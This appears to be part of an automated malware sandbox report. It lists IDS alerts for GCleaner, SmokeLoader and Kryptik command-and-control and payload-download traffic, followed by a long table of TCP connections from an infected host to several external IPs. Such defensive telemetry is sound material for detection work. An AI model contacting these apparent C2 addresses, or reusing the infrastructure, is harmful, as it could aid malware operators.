                                      2024-08-21T10:58:38.243341+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616000680192.168.2.445.9.20.13
                                      2024-08-21T10:57:50.877231+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)15997780192.168.2.4188.40.141.211
                                      2024-08-21T10:57:50.877231+0200TCP2847712ETPRO MALWARE Sharik/Smokeloader CnC Beacon 1715997780192.168.2.4188.40.141.211
                                      2024-08-21T10:57:50.877231+0200TCP2850316ETPRO MALWARE Observed SmokeLoader CnC Activity15997780192.168.2.4188.40.141.211
                                      2024-08-21T10:59:50.692749+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360062443192.168.2.4162.159.130.233
                                      2024-08-21T10:58:54.322701+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16001880192.168.2.445.9.20.13
                                      2024-08-21T10:58:54.322701+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616001880192.168.2.445.9.20.13
                                      2024-08-21T11:00:28.289954+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16008880192.168.2.445.9.20.13
                                      2024-08-21T11:00:28.289954+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616008880192.168.2.445.9.20.13
                                      2024-08-21T10:59:45.053323+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H360058443192.168.2.4162.159.130.233
                                      2024-08-21T10:59:51.243221+0200TCP2850107ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload16006180192.168.2.445.9.20.13
                                      2024-08-21T10:59:51.243221+0200TCP2850938ETPRO MALWARE GCleaner Downloader Activity M616006180192.168.2.445.9.20.13
                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 21, 2024 10:57:06.862601042 CEST4973480192.168.2.445.133.1.107
                                      Aug 21, 2024 10:57:06.867620945 CEST804973445.133.1.107192.168.2.4
                                      Aug 21, 2024 10:57:06.867691994 CEST4973480192.168.2.445.133.1.107
                                      Aug 21, 2024 10:57:06.867872953 CEST4973480192.168.2.445.133.1.107
                                      Aug 21, 2024 10:57:06.872698069 CEST804973445.133.1.107192.168.2.4
                                      Aug 21, 2024 10:57:10.057600975 CEST4973580192.168.2.4208.95.112.1
                                      Aug 21, 2024 10:57:10.062426090 CEST8049735208.95.112.1192.168.2.4
                                      Aug 21, 2024 10:57:10.062515020 CEST4973580192.168.2.4208.95.112.1
                                      Aug 21, 2024 10:57:10.062691927 CEST4973580192.168.2.4208.95.112.1
                                      Aug 21, 2024 10:57:10.067411900 CEST8049735208.95.112.1192.168.2.4
                                      Aug 21, 2024 10:57:10.149981976 CEST49736443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:10.150016069 CEST44349736162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:10.150078058 CEST49736443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:10.167957067 CEST49736443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:10.167968988 CEST44349736162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:10.529217958 CEST8049735208.95.112.1192.168.2.4
                                      Aug 21, 2024 10:57:10.646487951 CEST44349736162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:10.646631002 CEST49736443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:10.650338888 CEST49736443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:10.650374889 CEST44349736162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:10.650649071 CEST44349736162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:10.679940939 CEST4973580192.168.2.4208.95.112.1
                                      Aug 21, 2024 10:57:10.738539934 CEST49736443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:10.780505896 CEST44349736162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:10.848747015 CEST44349736162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:10.848798990 CEST44349736162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:10.848853111 CEST49736443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:11.137172937 CEST49736443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:12.649297953 CEST5993627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:12.654289007 CEST276435993645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:12.654419899 CEST5993627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:12.785568953 CEST5993627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:12.790458918 CEST276435993645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:13.483330965 CEST276435993645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:13.483417034 CEST5993627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:13.646389961 CEST5993627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:14.178126097 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:14.178173065 CEST44359938172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:14.178237915 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:14.185307980 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:14.185322046 CEST44359938172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:14.667154074 CEST44359938172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:14.667243958 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:14.681103945 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:14.681139946 CEST44359938172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:14.681509018 CEST44359938172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:14.867491007 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:15.098182917 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:15.144503117 CEST44359938172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:15.558393002 CEST44359938172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:15.558497906 CEST44359938172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:15.558549881 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:15.590802908 CEST59940443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:15.590837955 CEST44359940172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:15.590940952 CEST59940443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:15.591204882 CEST59940443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:15.591218948 CEST44359940172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:16.057670116 CEST44359940172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:16.079189062 CEST59940443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:16.079265118 CEST44359940172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:16.281562090 CEST59942443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:16.281605005 CEST44359942162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:16.281685114 CEST59942443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:16.282030106 CEST59942443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:16.282044888 CEST44359942162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:16.527234077 CEST44359940172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:16.527513981 CEST44359940172.67.132.113192.168.2.4
                                      Aug 21, 2024 10:57:16.527578115 CEST59940443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:16.540870905 CEST59940443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:16.769578934 CEST44359942162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:16.778312922 CEST59942443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:16.778382063 CEST44359942162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:16.929496050 CEST44359942162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:16.929541111 CEST44359942162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:16.929991007 CEST59942443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:16.933195114 CEST59942443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:18.698575974 CEST5995027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:18.703459978 CEST276435995045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:18.703542948 CEST5995027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:18.703766108 CEST5995027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:18.708525896 CEST276435995045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:19.521554947 CEST276435995045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:19.523924112 CEST5995027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:19.524736881 CEST5995027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:19.782980919 CEST59938443192.168.2.4172.67.132.113
                                      Aug 21, 2024 10:57:21.951450109 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:21.951479912 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:21.951597929 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:21.951958895 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:21.951978922 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.421165943 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.481359959 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:22.481374979 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.594372034 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.594433069 CEST44359953162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:22.594482899 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:22.600040913 CEST59953443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:24.540921926 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:24.545737028 CEST276435995845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:24.545816898 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:24.546155930 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:24.550996065 CEST276435995845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:25.366182089 CEST276435995845.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:25.367302895 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:25.367546082 CEST5995827643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:27.615659952 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:27.615695953 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:27.615762949 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:27.616017103 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:27.616030931 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.078911066 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.082354069 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:28.082385063 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.229324102 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.229366064 CEST44359962162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:28.229440928 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:28.230115891 CEST59962443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:28.273925066 CEST804973445.133.1.107192.168.2.4
                                      Aug 21, 2024 10:57:28.274003983 CEST4973480192.168.2.445.133.1.107
                                      Aug 21, 2024 10:57:28.275230885 CEST4973480192.168.2.445.133.1.107
                                      Aug 21, 2024 10:57:28.280065060 CEST804973445.133.1.107192.168.2.4
                                      Aug 21, 2024 10:57:28.465111971 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.465190887 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:28.465378046 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.466900110 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.466933966 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:28.950788975 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:28.950858116 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.952613115 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:28.952617884 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:28.952950001 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.017107010 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:29.064498901 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.516429901 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.516602039 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.516702890 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:29.565164089 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:29.565201998 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.565213919 CEST59963443192.168.2.4172.67.19.24
                                      Aug 21, 2024 10:57:29.565218925 CEST44359963172.67.19.24192.168.2.4
                                      Aug 21, 2024 10:57:29.898149014 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:29.902998924 CEST8059965172.67.133.215192.168.2.4
                                      Aug 21, 2024 10:57:29.903069019 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:29.903273106 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:29.908073902 CEST8059965172.67.133.215192.168.2.4
                                      Aug 21, 2024 10:57:30.385328054 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:30.390274048 CEST276435996645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:30.390567064 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:30.390830040 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:30.395608902 CEST276435996645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:30.610217094 CEST8059965172.67.133.215192.168.2.4
                                      Aug 21, 2024 10:57:30.610367060 CEST8059965172.67.133.215192.168.2.4
                                      Aug 21, 2024 10:57:30.611092091 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:30.637482882 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:30.642270088 CEST805996751.178.186.149192.168.2.4
                                      Aug 21, 2024 10:57:30.642353058 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:30.643382072 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:30.648216009 CEST805996751.178.186.149192.168.2.4
                                      Aug 21, 2024 10:57:31.239882946 CEST276435996645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:31.241185904 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:31.241692066 CEST5996627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:31.418451071 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:31.423537016 CEST805996845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:31.423621893 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:31.423799038 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:31.428807974 CEST805996845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:33.114460945 CEST4973580192.168.2.4208.95.112.1
                                      Aug 21, 2024 10:57:33.243685961 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.243714094 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.243788958 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.244193077 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.244204998 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.738992929 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.743833065 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.743840933 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.894421101 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.894561052 CEST44359969162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:33.894634962 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:33.895313025 CEST59969443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:36.244864941 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:36.250035048 CEST276435997045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:36.250145912 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:36.250515938 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:36.255544901 CEST276435997045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:37.085571051 CEST276435997045.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:37.085666895 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:37.093982935 CEST5997027643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:37.291589022 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:37.296601057 CEST480559971135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:37.296711922 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:37.572859049 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:37.577908993 CEST480559971135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:38.900398016 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:38.900434971 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:38.900511980 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:38.900944948 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:38.900958061 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.022706985 CEST480559971135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:39.027128935 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:39.227078915 CEST599714805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:39.370297909 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.371570110 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:39.371582985 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.501210928 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.501368999 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.501429081 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:39.501883984 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:42.103759050 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:42.108768940 CEST276435997345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:42.108885050 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:42.109543085 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:42.114348888 CEST276435997345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:42.953701973 CEST276435997345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:42.953804016 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:42.953996897 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:44.301940918 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:44.306934118 CEST480559974135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:44.307017088 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:44.307351112 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:44.312346935 CEST480559974135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:44.516002893 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:44.516050100 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:44.516141891 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:44.516426086 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:44.516441107 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:44.980123997 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:44.981347084 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:44.981369019 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:45.127501965 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:45.127593040 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:45.127631903 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:45.128249884 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:46.001390934 CEST480559974135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:46.001600027 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:46.001828909 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:47.963668108 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:47.972677946 CEST276435997645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:47.972758055 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:47.973298073 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:47.978104115 CEST276435997645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:48.789632082 CEST276435997645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:48.789741039 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:48.790159941 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:49.610429049 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:49.617674112 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:49.617748976 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:49.617980957 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:49.618021965 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:49.622734070 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:49.622802019 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.134686947 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.134728909 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.134805918 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.135078907 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.135091066 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.304039955 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.318002939 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:50.318109035 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:50.322840929 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.322973967 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.751966000 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.753838062 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.755707026 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.755723953 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.877175093 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.877230883 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:50.895236969 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.895301104 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.895351887 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.895847082 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:51.010175943 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:51.015106916 CEST480559979135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:51.015180111 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:51.015455961 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:51.020684958 CEST480559979135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:52.018727064 CEST805996751.178.186.149192.168.2.4
                                      Aug 21, 2024 10:57:52.018791914 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:52.018881083 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:52.024928093 CEST805996751.178.186.149192.168.2.4
                                      Aug 21, 2024 10:57:52.284435034 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:52.704793930 CEST480559979135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:52.704888105 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:52.705101967 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:52.783716917 CEST805996845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:52.783806086 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.783950090 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.785598040 CEST5998080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.788767099 CEST805996845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:52.790397882 CEST805998045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:52.790494919 CEST5998080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.790793896 CEST5998080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.795676947 CEST805998045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:53.807271957 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:53.812330961 CEST276435998145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:53.812402964 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:53.812706947 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:53.817740917 CEST276435998145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:54.631992102 CEST276435998145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:54.632060051 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:54.632527113 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:55.900662899 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:55.900703907 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:55.900788069 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:55.901031971 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:55.901046038 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.386512041 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.387732029 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:56.387758017 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.540587902 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.540673971 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.540923119 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:56.541388988 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:57.712759972 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:57.718018055 CEST480559985135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:57.718110085 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:57.718367100 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:57.727309942 CEST480559985135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:59.423563004 CEST480559985135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:59.423701048 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:59.423942089 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:59.654083014 CEST5998727643192.168.2.445.142.215.47
